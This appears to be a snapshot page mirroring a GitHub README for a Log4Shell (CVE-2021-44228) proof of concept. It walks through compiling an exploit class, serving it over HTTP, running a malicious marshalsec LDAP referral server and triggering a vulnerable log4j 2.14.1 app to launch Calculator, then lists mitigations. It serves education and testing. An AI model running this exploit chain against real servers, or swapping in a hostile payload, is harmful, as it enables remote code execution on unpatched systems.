Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/sunnyvale-it/CVE-2021-44228-PoC
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
CVE-2021-44228 (Log4Shell) Proof of Concept
Readme
# CVE-2021-44228 (Log4Shell) Proof of Concept

![](img/0.gif)

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

To help customers understand how this flaw works, we prepared this repo with a simple yet working Proof of Concept.

## Prerequisites

Having installed locally:

- Git
- JDK 11
- Maven
- Python

At the moment, the arbitrary code launches the Calculator application on macOS or Windows, so only those two operating systems are supported by this PoC.

## Disclaimer

All informations and code are provided solely for educational purposes and/or testing your own systems for this vulnerability.

## The attack tecnique

This PoC resemble the described in the picture below (credits [GovCERT.ch](https://GovCERT.ch)), a part from the vulnerable server that is just a simple Java class for the sake of simplicity. It's important to understand that this vulnerability may be triggered in various ways, what is described below is just one of them.

![](img/1.jpeg)

## How to run the PoC

Clone this repo

```console
terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git
```

Compile the exploit (using JDK 11)

```console
terminal1 $ javac Exploit.java
```

Run an HTTP server to serve the exploit

```console
terminal1 $ python -m SimpleHTTPServer 8888 --directory .
```

Start the malicious LDAPRefServer (thanks to https://github.com/mbechler/marshalsec)

```console
terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
```

Launch the buggy application (containing log4j 2.14.1)

```console
terminal3 $ mvn package && mvn exec:exec
```

If everything went fine, the Calculator application (arbitrary code execution) should pop-up

![](img/3.png)

## Quick mitigations (work on Log4J versions 2.10.0 up to 2.14.1)

### Set the LOG4J_FORMAT_MSG_NO_LOOKUPS env variable to true

```console
terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
```

```console
terminal3 $ mvn package && mvn exec:exec
```

In this case the Calculator shouldn't pop-up anymore

### Run the application with log4j2.formatMsgNoLookups System property set to true

```console
terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true
```
In this case the Calculator shouldn't pop-up anymore
File Snapshot

 [4.0K]  /data/pocs/9f6d5c9e713d08c9574cd5c1564d9d0664a14780
├── [ 581]  Exploit.java
├── [4.0K]  img
│   ├── [4.7K]  0.gif
│   ├── [102K]  1.jpeg
│   └── [536K]  3.png
├── [1.8K]  pom.xml
├── [2.5K]  README.md
├── [4.0K]  src
│   └── [4.0K]  main
│       └── [4.0K]  java
│           └── [ 327]  Main.java
└── [4.0K]  tools
    └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar

5 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.